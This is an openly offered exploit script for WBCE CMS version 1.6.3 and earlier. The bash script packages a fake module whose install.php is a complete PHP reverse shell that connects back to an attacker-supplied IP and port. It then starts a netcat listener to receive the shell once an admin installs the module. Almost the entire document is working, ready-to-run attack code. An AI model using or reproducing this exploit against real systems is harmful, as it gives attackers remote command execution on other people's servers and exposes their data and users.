# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
# Date: 3/22/2025
# Exploit Author: Swammers8
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS
# Version: 1.6.3 and prior
# Tested on: Ubuntu 24.04.2 LTS
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE
#!/bin/bash
# Make a zip file exploit
# Start netcat listener
if [[ $# -ne 2 ]]; then
echo "[*] Description:"
echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
echo "[*] It will create an infected module .zip file and start a netcat listener."
echo "[*] Once the zip is created, you will have to login to the admin page"
echo "[*] to upload and install the module, which will immediately run the shell"
echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
echo "[!] Usage:"
echo "[*] $0 <lhost> <lport>"
exit 1
fi
if [ -z "$(which nc)" ]; then
echo "[!] Netcat is not installed."
exit 1
fi
ip=$1
port=$2
rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule
echo [*] Crafting Payload
cat <<EOF > shellModule/info.php
<?php
/**
*
* @category modules
* @package Reverse Shell
* @author Swammers8
* @link https://swammers8.github.io/
* @license http://www.gnu.org/licenses/gpl.html
* @platform example.com
* @requirements PHP 5.6 and higher
* @version 1.3.3.7
* @lastmodified May 22 2025
*
*
*/
\$module_directory = 'modshell';
\$module_name = 'Reverse Shell';
\$module_function = 'page';
\$module_version = '1.3.3.7';
\$module_platform = '2.10.x';
\$module_author = 'Swammers8';
\$module_license = 'GNU General Public License';
\$module_description = 'This module is a backdoor';
?>
EOF
cat <<EOF > shellModule/install.php
<?php
set_time_limit (0);
\$VERSION = "1.0";
\$ip = '$ip'; // CHANGE THIS
\$port = $port; // CHANGE THIS
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;
if (function_exists('pcntl_fork')) {
\$pid = pcntl_fork();
if (\$pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if (\$pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
\$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
printit("\$errstr (\$errno)");
exit(1);
}
\$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
\$process = proc_open(\$shell, \$descriptorspec, \$pipes);
if (!is_resource(\$process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);
printit("Successfully opened reverse shell to \$ip:\$port");
while (1) {
if (feof(\$sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof(\$pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);
if (in_array(\$sock, \$read_a)) {
if (\$debug) printit("SOCK READ");
\$input = fread(\$sock, \$chunk_size);
if (\$debug) printit("SOCK: \$input");
fwrite(\$pipes[0], \$input);
}
if (in_array(\$pipes[1], \$read_a)) {
if (\$debug) printit("STDOUT READ");
\$input = fread(\$pipes[1], \$chunk_size);
if (\$debug) printit("STDOUT: \$input");
fwrite(\$sock, \$input);
}
if (in_array(\$pipes[2], \$read_a)) {
if (\$debug) printit("STDERR READ");
\$input = fread(\$pipes[2], \$chunk_size);
if (\$debug) printit("STDERR: \$input");
fwrite(\$sock, \$input);
}
}
fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);
function printit (\$string) {
if (!\$daemon) {
print "\$string\n";
}
}
?>
EOF
echo [*] Zipping to shellModule.zip
zip -r shellModule.zip shellModule
rm -rf shellModule
echo [*] Please login to the WBCE admin panel to upload and install the module
echo [*] Starting listener
nc -lvnp $port
echo
echo
echo "[*] Done!"
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"
